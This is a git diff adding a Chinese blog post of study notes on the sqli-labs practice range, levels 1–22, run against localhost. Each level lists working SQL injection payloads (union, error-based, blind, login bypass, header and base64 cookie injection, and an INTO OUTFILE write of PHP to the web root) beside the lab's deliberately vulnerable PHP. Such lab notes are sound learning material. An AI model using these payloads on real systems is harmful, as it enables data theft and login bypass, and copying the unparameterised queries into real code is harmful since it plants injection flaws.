--- a/_posts/2020-9-15-Mysql注入靶场.md
+++ b/_posts/2020-9-15-Mysql注入靶场.md
@@ -11,3 +11,740 @@ tags:
      - 网络安全
      - sql注入
 ---
+
+
+
+
+
+# sqli-labs靶场笔记
+
+## less-1
+
+- 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是单引号闭合；输入`id=1' order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,database(),@@version--+++`得到结果。
+
+- 结果：![sql-01](C:\Users\Administrator\Desktop\笔记\img\sql-labs_01.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo "<font size='5' color= '#99FF00'>";
+    	echo 'Your Login name:'. $row['username'];
+    	echo "<br>";
+    	echo 'Your Password:' .$row['password'];
+    	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font color= "#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</font>";  
+  	}
+  ```
+
+## less-2
+
+- 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是数字型输入；输入`id=1 order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=-1 union select 1,database(),@@version--+++`得到结果。
+
+- 结果：![sql-02](C:\Users\Administrator\Desktop\笔记\img\sql-labs_02.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo "<font size='5' color= '#99FF00'>";
+    	echo 'Your Login name:'. $row['username'];
+    	echo "<br>";
+    	echo 'Your Password:' .$row['password'];
+    	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font color= "#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</font>";  
+  	}
+  ```
+
+## less-3
+
+- 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是字符型`')`闭合方式；输入`id=1') order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=-1') union select 1,@@datadir,@@version_compile_os--+`得到结果。
+
+- 结果：![sql-03](C:\Users\Administrator\Desktop\笔记\img\sql-labs_03.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo "<font size='5' color= '#99FF00'>";
+    	echo 'Your Login name:'. $row['username'];
+    	echo "<br>";
+    	echo 'Your Password:' .$row['password'];
+    	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font color= "#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</font>";  
+  	}
+  ```
+
+## less-4
+
+- 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1"`，页面报错，经过观察sql语句是字符型`")`闭合方式；输入`id=1") order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-4/?id=-1") union select 1,@@datadir,@@version_compile_os--+`得到结果。
+
+- 结果：![sql-04](C:\Users\Administrator\Desktop\笔记\img\sql-labs_04.png)
+
+- 代码：
+
+  ```php
+  $id = '"' . $id . '"';
+  $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo "<font size='5' color= '#99FF00'>";
+    	echo 'Your Login name:'. $row['username'];
+    	echo "<br>";
+    	echo 'Your Password:' .$row['password'];
+    	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font color= "#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</font>";  
+  	}
+  ```
+
+## less-5
+
+- 思路：首先输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1'`，出现报错，且可以观察出sql语句是字符型`'`闭合方式，输入`id=1' --+`，成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x5e,@@version,0x5e),1)--+`。
+
+- 结果：![sql-5](C:\Users\Administrator\Desktop\笔记\img\sql-labs_05.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font size="5" color="#FFFF00">';	
+    	echo 'You are in...........';
+    	echo "<br>";
+      	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font size="3" color="#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</br></font>";	
+  	echo '<font color= "#0000ff" font size= 3>';	
+  	}
+  ```
+
+## less-6
+
+- 思路：首先输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1"`，出现报错，且可以观察出sql语句是字符型`"`闭合方式，输入`id=1" --+`，成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1" and updatexml(1,concat(0x5e,@@version,0x5e),1)--+`。
+
+- 结果：![sql-06](C:\Users\Administrator\Desktop\笔记\img\sql-labs_06.png)
+
+- 代码：
+
+  ```php
+  $id = '"'.$id.'"';
+  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font size="5" color="#FFFF00">';	
+    	echo 'You are in...........';
+    	echo "<br>";
+    	echo "</font>";
+    	}
+  	else 
+  	{	
+  	echo '<font size="3"  color= "#FFFF00">';
+  	print_r(mysql_error());
+  	echo "</br></font>";	
+  	echo '<font color= "#0000ff" font size= 3>';		
+  	}
+  ```
+
+## less-7
+
+- 思路：首先在`mysql.ini`中添加`secure-file-priv=''`，表示允许mysql可以对OS进行文件操作。输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1'`，出现报错，再次输入`id = 1'--+`，发现并没有闭合sql语句，尝试输入`id=1'))--+`，发现成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1')) union select 1,"<?php phpinfo();?>",@@version into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\1.php" --+`.
+
+- 结果：![sql-07](C:\Users\Administrator\Desktop\笔记\img\sql-labs_07.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font color= "#FFFF00">';	
+    	echo 'You are in.... Use outfile......';
+    	echo "<br>";
+    	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font color= "#FFFF00">';
+  	echo 'You have an error in your SQL syntax';
+  	//print_r(mysql_error());
+  	echo "</font>";  
+  	}
+  ```
+
+## less-8
+
+- 思路：	首先输入`id =1`和`id =2`，页面显示都一样，再次输入`id =1' and 1=1--+`和`id = 1' and 1=2--+`，页面出现了不同的变化，得出是字符型`'`闭合方式，不可以使用联合查询和报错查询，可以考虑结合burpsuit使用布尔盲注，`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1' and  length(database())>n--+`，n为用户的可控输入点
+
+- 结果：![sql-8](C:\Users\Administrator\Desktop\笔记\img\sql-labs_08.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font size="5" color="#FFFF00">';	
+    	echo 'You are in...........';
+    	echo "<br>";
+      	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font size="5" color="#FFFF00">';
+  	echo "</br></font>";	
+  	echo '<font color= "#0000ff" font size= 3>';		
+  	}
+  ```
+
+## less-9
+
+- 思路：输入`id =1' --+`和`id=1'and 1=2--+`页面都显示`You are in.....`，尝试把`'`改成`"`或者考虑数字型的情况下页面都没有发生变化，这个时候可能只有进行时间盲注了，输入`id=1'and sleep(5)--+`，发现页面跳转的时间增加了5秒，可以结合burpsuit进行时间盲注。输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9?id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+`
+
+- 结果：![sql-09](C:\Users\Administrator\Desktop\笔记\img\sql-labs_09.png)
+
+- 代码：
+
+  ```php
+  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font size="5" color="#FFFF00">';	
+    	echo 'You are in...........';
+    	echo "<br>";
+      	echo "</font>";
+    	}
+  	else 
+  	{
+  	echo '<font size="5" color="#FFFF00">';
+  	echo 'You are in...........';
+  	echo "</br></font>";	
+  	echo '<font color= "#0000ff" font size= 3>';	
+  	}
+  ```
+
+## less-10
+
+- 思路：思路：输入`id =1" --+`和`id=1" and 1=2--+`页面都显示`You are in.....`，尝试把`"`改成`'`或者考虑数字型的情况下页面都没有发生变化，这个时候可能只有进行时间盲注了，输入`id=1"and sleep(5)--+`，发现页面跳转的时间增加了5秒，可以结合burpsuit进行时间盲注。输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10?id=1" and if(substr(version(),1,1)='a',sleep(5),1)--+`
+
+- 结果：![sql-10](C:\Users\Administrator\Desktop\笔记\img\sql-labs_10.png)
+
+- 代码：
+
+  ```php
+  $id = '"'.$id.'"';
+  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    	echo '<font size="5" color="#FFFF00">';	
+    	echo 'You are in...........';
+    	echo "<br>";
+      	echo "</font>";
+    	}
+  	else 
+  	{	
+  	echo '<font size="5" color="#FFFF00">';
+  	echo 'You are in...........';
+  	echo "</br></font>";	
+  	echo '<font color= "#0000ff" font size= 3>';
+  	}
+  ```
+
+## less-11
+
+- 思路：在post参数中提交`uname=1 or 1=1 # &passwd=&submit=Submit`,出现登陆失败,再次输入`uname=1' or 1=1 --   &passwd=&submit=Submit`，登陆成功，出现用户名和密码。
+
+- 结果：![sql-11](C:\Users\Administrator\Desktop\笔记\img\sql-labs_11.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd']; 
+  	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	{
+  		echo 'Your Login name:'. $row['username'];
+  		echo "<br>";
+  		echo 'Your Password:' .$row['password'];
+  		echo "<br>";
+    	}
+  	else  
+  	{
+  		print_r(mysql_error());
+  	}
+  }
+  ```
+
+
+## less-12
+
+- 思路：首先输入`uname=1' or 1=1 --   &passwd=1111&submit=Submit`,显示登陆失败，再次输入`uname=1" or 1=1 --   &passwd=1111&submit=Submit`，出现报错提示，尝试输入`uname=1") or 1=1 --   &passwd=1111&submit=Submit`,登陆成功，获得用户名密码。
+
+- 结果：![sql-12](C:\Users\Administrator\Desktop\笔记\img\sql-labs_12.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd']; 
+      $uname='"'.$uname.'"';
+  	$passwd='"'.$passwd.'"'; 
+  	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	{
+  		echo 'Your Login name:'. $row['username'];
+  		echo "<br>";
+  		echo 'Your Password:' .$row['password'];
+  		echo "<br>";
+    	}
+  	else  
+  	{
+  		print_r(mysql_error());
+  	}
+  }
+  ```
+
+## less-13
+
+- 思路：尝试输入`uname=1") or 1=1 --   &passwd=&submit=Submit`，登陆失败，再次输入`uname=1') or 1=1 --   &passwd=&submit=Submit`，发现登陆成功。
+
+- 结果：![sql-13](C:\Users\Administrator\Desktop\笔记\img\sql-labs_13.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd'];
+  	@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	{
+    		//echo '<font color= "#0000ff">';	
+  		//echo " You Have successfully logged in " ;
+  		//echo 'Your Login name:'. $row['username'];
+  		//echo 'Your Password:' .$row['password'];
+    	}
+  	else  
+  	{
+  		//echo "Try again looser";
+  		print_r(mysql_error());
+  	}
+  }
+  ```
+
+## less-14
+
+- 思路：首先输入`uname=1") or 1=1 --   &passwd=&submit=Submit`,出现报错，根据报错信息再一次输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，登陆成功。
+
+- 结果：![sql-14](C:\Users\Administrator\Desktop\笔记\img\sql-labs_14.png)
+
+- 代码：
+
+  ```php  
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd'];
+  	$uname='"'.$uname.'"';
+  	$passwd='"'.$passwd.'"'; 
+  	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	
+  		//echo " You Have successfully logged in " ;
+  		//echo 'Your Login name:'. $row['username'];
+  		//echo 'Your Password:' .$row['password'];
+  		echo '<img src="../images/flag.jpg" />';	
+    	}
+  	else  
+  	{
+  		//echo "Try again looser";
+  		print_r(mysql_error());
+  		echo '<img src="../images/slap.jpg"  />';	
+  	}
+  }
+  ```
+
+## less-15
+
+- 思路：输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，显示登陆失败，再次输入`uname=1' or 1=1 --   &passwd=&submit=Submit`，显示登陆成功。
+
+- 结果：![sql-15](C:\Users\Administrator\Desktop\笔记\img\sql-labs_15.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd'];
+  	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	{
+  		//echo " You Have successfully logged in\n\n " ;
+  		//echo 'Your Login name:'. $row['username'];
+  		//echo 'Your Password:' .$row['password'];
+  		echo '<img src="../images/flag.jpg"  />';	
+    		echo "</font>";
+    	}
+  	else  
+  	{
+  		//echo "Try again looser";
+  		//print_r(mysql_error());
+  		echo '<img src="../images/slap.jpg"   />';	
+  	}
+  ```
+
+## less-16
+
+- 思路：首先输入`uname=1' or 1=1 --   &passwd=&submit=Submit`,显示登陆失败；再次输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，显示登陆失败，再次输入`uname=1") or 1=1 --   &passwd=&submit=Submit`，发现登陆成功。
+
+- 结果：![sql-16](C:\Users\Administrator\Desktop\笔记\img\sql-labs_16.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  	$uname=$_POST['uname'];
+  	$passwd=$_POST['passwd'];
+  	$uname='"'.$uname.'"';
+  	$passwd='"'.$passwd.'"'; 
+  	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
+  	$result=mysql_query($sql);
+  	$row = mysql_fetch_array($result);
+  	if($row)
+  	{
+  		//echo " You Have successfully logged in " ;
+  		//echo 'Your Login name:'. $row['username'];
+  		//echo 'Your Password:' .$row['password'];
+  		echo '<img src="../images/flag.jpg"  />';			
+    		echo "</font>";
+    	}
+  	else  
+  	{
+  		//echo "Try again looser";
+  		//print_r(mysql_error());
+  		echo '<img src="../images/slap.jpg"  />';	 
+  	}
+  }
+  ```
+
+## less-17
+
+- 思路：尝试输入`uname=admin&passwd=admin'&submit=Submit`，出现报错，可以利用报错点进行注入；输入`uname=admin&passwd=admin' and extractvalue(1,concat(0x5e,@@version_compile_os,0x5e))-- &submit=Submit`，获得所需要的信息。
+
+- 结果：![sql-17](C:\Users\Administrator\Desktop\笔记\img\sql-labs_17.png)
+
+- 代码：
+
+  ```php
+  function check_input($value)
+  	{
+  	//限制字符串长度
+  	if(!empty($value))
+  		{
+  		$value = substr($value,0,15);
+  		}
+  		// 为 GPC (Get/Post/Cookie) 操作设置 magic_quotes 状态。 当 magic_quotes 为 on，所有的 ' (单引号)、" (双引号)、\（反斜杠）和 NUL's 被一个反斜杠自动转义。 
+  		if (get_magic_quotes_gpc())
+  			{
+  			$value = stripslashes($value);//返回一个去除转义反斜线后的字符串（\' 转换为 ' 等等）。双反斜线（\\）被转换为单个反斜线（\）。 
+  			}
+  		// Quote if not a number
+  		if (!ctype_digit($value))//如果字符串是一个十进制数字，就返回 FALSE ；反之就返回 TRUE。 
+  			{
+  			$value = "'" . mysql_real_escape_string($value) . "'";//在以下字符前添加反斜杠: \x00, \n, \r, \, ', " 和 \x1a. 
+  			}		
+  		else
+  			{
+  			$value = intval($value);//通过使用指定的进制 base 转换（默认是十进制）  8、10、16 ==> 10
+  			}
+  	return $value;
+  	}
+  // take the variables
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  {
+  //making sure uname is not injectable
+  $uname=check_input($_POST['uname']);  
+  $passwd=$_POST['passwd'];y
+  @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
+  $result=mysql_query($sql);
+  $row = mysql_fetch_array($result);//从结果集中取得一行作为关联数组
+  	if($row)
+  	{
+  		 $row1 = $row['username'];  	
+  		//echo 'Your Login name:'. $row1;
+  		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
+  		mysql_query($update);
+  		if (mysql_error())
+  		{
+  			echo '<font color= "#FFFF00" font size = 3 >';
+  			print_r(mysql_error());
+  		}
+  		else
+  		{
+  			//echo " You password has been successfully updated " ;		
+  		}
+  		echo '<img src="../images/flag1.jpg"   />';	
+  		//echo 'Your Password:' .$row['password'];
+    	}
+  	else  
+  	{
+  		//echo "Bug off you Silly Dumb hacker";
+  		echo '<img src="../images/slap1.jpg"   />';
+  	}
+  }
+  ```
+
+## less-18
+
+- 思路：输入正确的用户名和密码后成功登陆，然后发现有自己的IP地址和user agent信息显示，考虑是否可以在这些地方进行注入，使用burpsuit抓包，并修改user agent信息为`1'`，出现报错，根据报错信息再次输入`1')--         #`，显示正常，最后输入`'  and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1`，出现结果。
+
+- 结果：![sql-18](C:\Users\Administrator\Desktop\笔记\img\sql-labs_18.png)
+
+- 代码：
+
+  ```php
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  	{
+  	$uname = check_input($_POST['uname']);
+  	$passwd = check_input($_POST['passwd']);
+  	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
+  	$result1 = mysql_query($sql);
+  	$row1 = mysql_fetch_array($result1);
+  		if($row1)
+  			{
+  			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
+  			mysql_query($insert);
+  			//echo 'Your IP ADDRESS is: ' .$IP;			
+  			echo 'Your User Agent is: ' .$uagent;
+  			print_r(mysql_error());			
+  			echo '<img src="../images/flag.jpg"  />';		
+  			}
+  		else
+  			{
+  			print_r(mysql_error());
+  			echo '<img src="../images/slap.jpg"   />';	
+  			}
+  
+  	}
+  
+  ```
+
+## less-19
+
+- 思路：输入正确的用户名和密码后成功登陆，然后发现有自己的IP地址和referer信息显示，考虑是否可以在这些地方进行注入，使用burpsuit抓包，并修改referer信息为`1'`，出现报错，根据报错信息再次输入`1')--         #`，显示正常，最后输入`1' and updatexml(1,concat(0x5e,@@datadir,0x5e),1) and '1' = '1`，出现结果。
+
+- 结果：![sql-19](C:\Users\Administrator\Desktop\笔记\img\sql-labs_19.png)
+
+- 代码：
+
+  ```php
+  	$uagent = $_SERVER['HTTP_REFERER'];
+  	$IP = $_SERVER['REMOTE_ADDR'];
+  	echo 'Your IP ADDRESS is: ' .$IP;
+  if(isset($_POST['uname']) && isset($_POST['passwd']))
+  	{
+  	$uname = check_input($_POST['uname']);
+  	$passwd = check_input($_POST['passwd']);
+  	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
+  	$result1 = mysql_query($sql);
+  	$row1 = mysql_fetch_array($result1);
+  		if($row1)
+  			{
+  			$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
+  			mysql_query($insert);		
+  			echo 'Your Referer is: ' .$uagent;
+  			print_r(mysql_error());		
+  			echo '<img src="../images/flag.jpg" />';
+  			}
+  		else
+  			{
+  			print_r(mysql_error());
+  			echo '<img src="../images/slap.jpg"  />';	 
+  			}
+  	}
+  
+  ```
+
+## less-20
+
+- 思路：这一关是cookie注入，首先要输入正确的用户名密码，登录进去；然后抓取有cookie的数据包，对cookie进行修改，尝试输入`uname=admin'`，发现报错，再次输入` uname=admin' and updatexml(1,concat(0x5e,database(),0x5e),1) --   #`,显示出我们想要的数据库名字。
+
+- 结果：![sql-20](C:\Users\Administrator\Desktop\笔记\img\sql-labs_20.png)
+
+- 代码：
+
+  ```php
+  	if(!isset($_POST['submit']))
+  		{
+  			$cookee = $_COOKIE['uname'];
+  			$format = 'D d M Y - H:i:s';
+  			$timestamp = time() + 3600;
+  			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
+  			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];				
+  			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);						
+  			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
+  			$result=mysql_query($sql);
+  			if (!$result)
+    				{
+    				die('Issue with your mysql: ' . mysql_error());
+    				}
+  			$row = mysql_fetch_array($result);
+  			if($row)
+  				{
+  			  	echo 'Your Login name:'. $row['username'];
+  				echo 'Your Password:' .$row['password'];
+  				echo 'Your ID:' .$row['id'];
+  			  	}
+  			else	
+  				{
+  				echo '<img src="../images/slap1.jpg" />';
+  				}
+  		}	
+  	
+  ```
+
+## less-21
+
+- 思路：通过查看cookie,发现进行了base64编码，所以要对payload进行base64编码输入。`uname=YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSxAQHZlcnNpb24sMHg1ZSksMSkgYW5kICcxJyA9JzE=`，得到mysql的版本信息。
+
+- 结果：![sql-21](C:\Users\Administrator\Desktop\笔记\img\sql-labs_21.png)
+
+- 代码：
+
+  ```php
+  	if(!isset($_POST['submit']))
+  		{
+  			$cookee = $_COOKIE['uname'];
+  			$format = 'D d M Y - H:i:s';
+  			$timestamp = time() + 3600;
+  			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
+  			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];				
+  			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);	
+          	$cookee = base64_decode($cookee);
+  			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
+  			$result=mysql_query($sql);
+  			if (!$result)
+    				{
+    				die('Issue with your mysql: ' . mysql_error());
+    				}
+  			$row = mysql_fetch_array($result);
+  			if($row)
+  				{
+  			  	echo 'Your Login name:'. $row['username'];
+  				echo 'Your Password:' .$row['password'];
+  				echo 'Your ID:' .$row['id'];
+  			  	}
+  			else	
+  				{
+  				echo '<img src="../images/slap1.jpg" />';
+  				}
+  		}	
+  	
+  ```
+
+## less-22
+
+- 思路：这一关和上一关都是进行base64编码，只是由`'`变成了`"`，输入`uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSx1c2VyKCksMHg1ZSksMSktLSAgICM=`，成功出现用户信息。
+
+- 结果：![sql-22](C:\Users\Administrator\Desktop\笔记\img\sql-labs_22.png)
+
+- 代码：
+
+  ```php
+  if(!isset($_POST['submit']))
+  		{
+  			$cookee = $_COOKIE['uname'];
+  			$format = 'D d M Y - H:i:s';
+  			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
+  			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];				
+  			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
+  			$cookee = base64_decode($cookee);
+  			$cookee1 = '"'. $cookee. '"';
+  			$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
+  			$result=mysql_query($sql);
+  			if (!$result)
+    				{
+    				die('Issue with your mysql: ' . mysql_error());
+    				}
+  			$row = mysql_fetch_array($result);
+  			if($row)
+  				{
+  			  	echo 'Your Login name:'. $row['username'];  	
+  				echo 'Your Password:' .$row['password'];
+  				echo 'Your ID:' .$row['id'];
+  			  	}
+      		else	
+  				{
+  				echo '<img src="../images/slap1.jpg" />';
+  				}
+      		}	
+  ```
+
